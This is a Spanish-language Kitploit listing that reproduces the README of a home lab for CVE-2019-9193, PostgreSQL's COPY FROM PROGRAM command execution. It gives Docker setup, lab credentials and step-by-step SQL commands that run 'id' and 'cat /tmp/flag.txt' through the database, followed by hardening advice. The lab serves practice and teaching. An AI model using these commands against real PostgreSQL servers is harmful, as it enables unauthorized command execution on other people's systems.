Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-9193-Home-Lab — Este laboratorio simula CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE | Kitploit
Herramientas/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de DatosLabs y Práctica
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

Este laboratorio simula CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

CVE20199193-2

INGLÉS ABAJO

Este laboratorio simula la vulnerabilidad CVE-2019-9193 presente en PostgreSQL versión 9.3 - 11.2, que permite a los usuarios superuser o con el rol pg_execute_server_program usar el comando:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

para ejecutar comandos del sistema operativo directamente, lo que provoca Remote Command Execution (RCE) si el atacante puede acceder a la base de datos.

Este laboratorio te permite usar esta capacidad para leer el archivo:

root@kitploit:~
/tmp/flag.txt

Objetivo del laboratorio

  1. Conéctate a PostgreSQL con:
    • Usuario: postgres
    • Contraseña: sentinel7
    • Puerto: 5433
  2. Usa COPY FROM PROGRAM para ejecutar comandos del sistema
  • Lee la flag de /tmp/flag.txt

  • Primeros pasos

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    A continuación, conéctate a la base de datos:

    root@kitploit:~
    psql -U postgres -h 127.0.0.1 -p 5433
    

    Pasos del ataque

    1) Crear una tabla para almacenar la salida

    root@kitploit:~
    CREATE TABLE cmd_exec(cmd_output text);
    

    2) Probar RCE con el comando id

    root@kitploit:~
    COPY cmd_exec FROM PROGRAM 'id';
    SELECT * FROM cmd_exec;
    

    3) Leer la flag

    root@kitploit:~
    TRUNCATE cmd_exec;
    COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
    SELECT * FROM cmd_exec;
    

    Ejemplo de salida:

    root@kitploit:~
    flag{SECRET}
    

    Recomendaciones de seguridad

    • No uses el usuario postgres en aplicaciones reales
    • Restringe los roles para que no tengan pg_execute_server_program
    • Desactiva o restringe el uso de COPY PROGRAM
    • Protege todos los sistemas contra SQLi

    VERSIÓN EN INGLÉS

    CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

    Este laboratorio simula CVE-2019-9193, una vulnerabilidad de PostgreSQL 9.3–11.2 que permite:

    root@kitploit:~
    COPY ... FROM PROGRAM '<command>'
    

    ejecutar comandos del sistema operativo cuando lo usa un superusuario o un rol con pg_execute_server_program.

    Tu tarea es explotar esta función para leer:

    root@kitploit:~
    /tmp/flag.txt
    

    Objetivo

    1. Conéctate a PostgreSQL:
      • Usuario: postgres
      • Contraseña: sentinel7
      • Puerto del host: 5433
    2. Usa COPY FROM PROGRAM para:
      • Ejecutar comandos del sistema operativo
      • Recuperar la flag

    Primeros pasos

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    Conéctate a través de:

    root@kitploit:~
    psql -U postgres -h 127.0.0.1 -p 5433
    

    Explotación

    1) Crear la tabla

    root@kitploit:~
    CREATE TABLE cmd_exec(cmd_output text);
    

    2) Probar RCE

    root@kitploit:~
    COPY cmd_exec FROM PROGRAM 'id';
    SELECT * FROM cmd_exec;
    

    3) Leer la flag

    root@kitploit:~
    TRUNCATE cmd_exec;
    COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
    SELECT * FROM cmd_exec;
    

    Notas de seguridad

    • Nunca ejecutes aplicaciones que utilicen el superusuario de PostgreSQL
    • No concedas pg_execute_server_program innecesariamente
    • Desactiva o restringe COPY PROGRAM
    • Refuerza las aplicaciones contra la inyección SQL

    Descargar herramienta